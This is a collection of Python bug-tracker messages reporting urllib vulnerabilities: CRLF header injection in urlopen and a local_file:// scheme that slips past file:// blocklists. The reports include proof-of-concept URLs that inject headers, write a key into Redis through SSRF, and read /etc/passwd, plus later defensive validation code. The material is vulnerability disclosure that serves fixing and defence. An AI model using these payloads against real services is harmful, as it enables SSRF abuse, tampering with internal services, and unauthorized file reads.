[issue30458] [security][CVE-2019-9740][CVE-2019-9947] HTTP Header Injection (follow-up of CVE-2016-5699)
Change by Sihoon Lee:

--
pull_requests: +13545
pull_request: https://github.com/python/cpython/pull/12524

_______________________________________
Python tracker <https://bugs.python.org/issue30458>
_______________________________________
_______________________________________
Python-bugs-list mailing list
Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35906] Header Injection in urllib
New submission from Sihoon Lee:

This patch can also be broken by the path and query string.
http://www.cvedetails.com/cve/CVE-2016-5699/
https://bugs.python.org/issue30458

It can succeed in injecting HTTP headers, and it is more critical because it bypasses the illegal-header check.

# Vulnerability PoC

```python
>>> import urllib.request
>>> urllib.request.urlopen('http://127.0.0.1:1234/?q=HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n')
```

or

```python
>>> urllib.request.urlopen('http://127.0.0.1:1234/HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n')
```

```
> nc -lv 1234
GET /?q=HTTP/1.1
Header: Value
Header2: HTTP/1.1
Accept-Encoding: identity
Host: 127.0.0.1:1234
User-Agent: Python-urllib/3.8
Connection: close
```

We can inject headers completely.

## Redis

Redis is also affected: its SSRF protection, which checks for the "Host:" header, can be bypassed with this injection.

```python
>>> urllib2.urlopen('http://127.0.0.1:6379/?q=HTTP/1.1\r\nSET VULN POC\r\nHeader2:\r\n').read()
'$-1\r\n+OK\r\n-ERR unknown command `Header2:`, with args beginning with: `HTTP/1.1`, \r\n-ERR unknown command `Accept-Encoding:`, with args beginning with: `identity`, \r\n'
```

```
$ redis-cli
127.0.0.1:6379> GET VULN
"POC"
```

# Root Cause

https://github.com/python/cpython/commit/cc54c1c0d2d05fe7404ba64c53df4b1352ed2262

```diff
- _hostprog = re.compile('^//([^/?]*)(.*)$')
+ _hostprog = re.compile('//([^/#?]*)(.*)', re.DOTALL)
```

It succeeds in parsing the host because of re.DOTALL; re.DOTALL gave the opportunity for injection.
The version of this commit was 3.4.7+, so this vulnerability affects 3.4.7+ ~ 3.8-dev <- I tested it.
Also, Python 2.7.15 is affected. I don't know which Python 2 versions are affected because I did not test them. Maybe after the commit, all higher versions can trigger this vulnerability.

# Conclusion

This patch introduces a more critical vulnerability that bypasses the illegal-header check, and we can inject HTTP headers completely in urlopen() because of this patch.
(Although this vulnerability is old, from 12 Jul 2017, I don't know why no one has submitted an issue until now XDD)

--
components: Library (Lib)
messages: 334896
nosy: push0ebp
priority: normal
severity: normal
status: open
title: Header Injection in urllib
type: security
versions: Python 2.7, Python 3.4, Python 3.5, Python 3.6, Python 3.7, Python 3.8

_______________________________________
Python tracker <https://bugs.python.org/issue35906>
_______________________________________
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
New submission from Sihoon Lee:

An unnecessary scheme exists in urlopen() of urllib. When people want to protect the file system from being read through an HTTP request in urlopen(), they often filter like this against SSRF.

# Vulnerability PoC

```python
import urllib
print urllib.urlopen('local_file:///etc/passwd').read()[:30]
```

The result is:

```
##
# User Database
# 
# Note t
```

But if we use a scheme like this, URL parsing with urlparse() cannot parse the scheme. This is the parsed result:

```
ParseResult(scheme='', netloc='', path='local_file:/etc/passwd', params='', query='', fragment='')
```

```python
def request(url):
    from urllib import urlopen
    from urlparse import urlparse
    result = urlparse(url)
    scheme = result.scheme
    if not scheme:
        return False  # raise Exception("Required scheme")
    if scheme == 'file':
        return False  # raise Exception("Don't open file")
    res = urlopen(url)
    content = res.read()
    print url, content[:30]
    return True

assert request('file:///etc/passwd') == False
assert request(' file:///etc/passwd') == False
assert request('File:///etc/passwd') == False
assert request('http://www.google.com') != False
```

If they filter only file://, this mitigation against SSRF can be bypassed in this way:

```python
assert request('local-file:/etc/passwd') == True
```

```
ParseResult(scheme='local-file', netloc='', path='/etc/passwd', params='', query='', fragment='')
```

URL parsing can also be passed.

# Attack scenario

This is the unnecessary URL scheme ("local_file"). Even if there is filtering, an attacker can read arbitrary files by bypassing it with this scheme.
# Root Cause

URLopener::open in urllib.py, from line 203:

```python
        name = 'open_' + urltype
        self.type = urltype
        name = name.replace('-', '_')  # it also allows local-file
        if not hasattr(self, name):  # passed here: hasattr(URLopener, 'open_local_file')
            if proxy:
                return self.open_unknown_proxy(proxy, fullurl, data)
            else:
                return self.open_unknown(fullurl, data)
        try:
            if data is None:
                return getattr(self, name)(url)
            else:
                return getattr(self, name)(url, data)  # returns URLopener::open_local_file
```

It may be just a trick, because people usually use a whitelist (allowing only http or https). But anyone who uses a blacklist, like filtering file://, will be affected and SSRF can be triggered.

--
components: Library (Lib)
messages: 334905
nosy: push0ebp
priority: normal
severity: normal
status: open
title: Unnecessary URL scheme exists to allow file:// reading file in urllib
type: security
versions: Python 2.7

_______________________________________
Python tracker <https://bugs.python.org/issue35907>
_______________________________________
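Both reports above (issue35906 and issue35907) point at the same defensive rule: validate the URL before urlopen() ever sees it. The following is an added example, not the reporter's code and not CPython's fix; it first reproduces, with the two `_hostprog` regexes quoted in issue35906, why the re.DOTALL version parses a host out of a URL containing CR/LF while the older one does not, and then shows a check that rejects control characters and enforces a scheme allowlist instead of the file:// blocklist discussed in issue35907. The `[\x00-\x20\x7f]` character class, the http/https allowlist and the helper names are this example's own choices.

```python
import re
from urllib.parse import urlsplit

# The two host regexes quoted in issue35906's root cause (before/after commit cc54c1c0).
_HOSTPROG_OLD = re.compile('^//([^/?]*)(.*)$')
_HOSTPROG_NEW = re.compile('//([^/#?]*)(.*)', re.DOTALL)


def splithost(regex, url):
    """Mimic urllib's splithost(): (host, rest) on a match, else (None, url)."""
    m = regex.match(url)
    return m.groups() if m else (None, url)


# Defensive check (this example's own choice, not the reporter's code):
# ASCII control characters, space and DEL never belong in a URL handed to an
# HTTP client, and a scheme allowlist replaces the fragile file:// blocklist.
_DISALLOWED = re.compile(r'[\x00-\x20\x7f]')
ALLOWED_SCHEMES = frozenset({'http', 'https'})


def validate_url(url):
    """Return url if it may be passed to urlopen(), otherwise raise ValueError."""
    if _DISALLOWED.search(url):
        raise ValueError('URL contains control or whitespace characters')
    parts = urlsplit(url)  # lowercases the scheme, so 'File' is seen as 'file'
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError('scheme %r is not allowed' % parts.scheme)
    if not parts.hostname:
        raise ValueError('no host given')
    return url


def is_safe(url):
    try:
        validate_url(url)
    except ValueError:
        return False
    return True


if __name__ == '__main__':
    crlf = '//127.0.0.1:1234/?q=HTTP/1.1\r\nHeader: Value\r\n'
    print(splithost(_HOSTPROG_OLD, crlf))  # (None, ...): old urllib raised "no host given"
    print(splithost(_HOSTPROG_NEW, crlf))  # ('127.0.0.1:1234', ...): host parsed, CRLF kept
    for u in ('http://127.0.0.1:1234/?q=HTTP/1.1\r\nHeader: Value\r\n', 'file:///etc/passwd',
              ' file:///etc/passwd', 'File:///etc/passwd', 'local_file:///etc/passwd',
              'local-file:/etc/passwd', 'http://www.google.com'):
        print(is_safe(u), repr(u))
```

Note that `urlsplit()` treats `local_file:` as no scheme at all (underscore is not a scheme character) and `local-file:` as an unknown scheme; the allowlist rejects both, whereas a blocklist on `file` catches neither.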
[issue35909] Zip Slip Vulnerability
Sihoon Lee added the comment:

When I tested it before, it did not work. Did it really work? Could you show me your PoC code?

--
nosy: +push0ebp -lars.gustaebel

_______________________________________
Python tracker <https://bugs.python.org/issue35909>
_______________________________________
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
Sihoon Lee added the comment:

Sorry for my bad English. Yes, exactly. Only Python 2.7 is affected, not Python 3. So I chose only the Python 2.7 version.

--

_______________________________________
Python tracker <https://bugs.python.org/issue35907>
_______________________________________
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
Sihoon Lee added the comment:

And only urllib, not urllib2.

--

_______________________________________
Python tracker <https://bugs.python.org/issue35907>
_______________________________________
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
Sihoon Lee added the comment:

I am also not a native English speaker. It's OK. Thank you for reading my report.

--

_______________________________________
Python tracker <https://bugs.python.org/issue35907>
_______________________________________
[issue35906] Header Injection in urllib
Sihoon Lee added the comment:

Sorry, I'm late. My review is here: https://github.com/python/cpython/pull/11768

--

_______________________________________
Python tracker <https://bugs.python.org/issue35906>
_______________________________________
[issue35906] Header Injection in urllib
Sihoon Lee added the comment:

Yes, I thought so. Before the commit I mentioned, the previous version (~3.4.6) raised an exception ("no host given") in urlopen when it failed to parse the host. If this patch wants to behave the same as the previous version, it is right to raise an exception like the previous version did. I thought there is no exact answer; it only depends on Python features.

--

_______________________________________
Python tracker <https://bugs.python.org/issue35906>
_______________________________________
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
Change by Sihoon Lee:

--
keywords: +patch
pull_requests: +11872
stage: needs patch -> patch review

_______________________________________
Python tracker <https://bugs.python.org/issue35907>
_______________________________________
[issue35906] Header Injection in urllib
Change by Sihoon Lee:

--
pull_requests: +12474

_______________________________________
Python tracker <https://bugs.python.org/issue35906>
_______________________________________
[issue35906] Header Injection in urllib
Change by Sihoon Lee:

--
pull_requests: -12474

_______________________________________
Python tracker <https://bugs.python.org/issue35906>
_______________________________________
[issue35906] Header Injection in urllib
Change by Sihoon Lee:

--
pull_requests: +12475

_______________________________________
Python tracker <https://bugs.python.org/issue35906>
_______________________________________
[issue35906] Header Injection in urllib
Change by Sihoon Lee:

--
pull_requests: +12476

_______________________________________
Python tracker <https://bugs.python.org/issue35906>
_______________________________________
[issue35906] Header Injection in urllib
Change by Sihoon Lee:

--
pull_requests: -12476

_______________________________________
Python tracker <https://bugs.python.org/issue35906>
_______________________________________
[issue35907] [security][CVE-2019-9948] Unnecessary URL scheme exists to allow local_file:// reading file in urllib
Sihoon Lee added the comment:

If developers allow only http:// or https:// as a whitelist, there is no problem. But if someone blocks only file://, an attacker can bypass it. This issue may provide an attacker with a bypass method through a new scheme.

--

_______________________________________
Python tracker <https://bugs.python.org/issue35907>
_______________________________________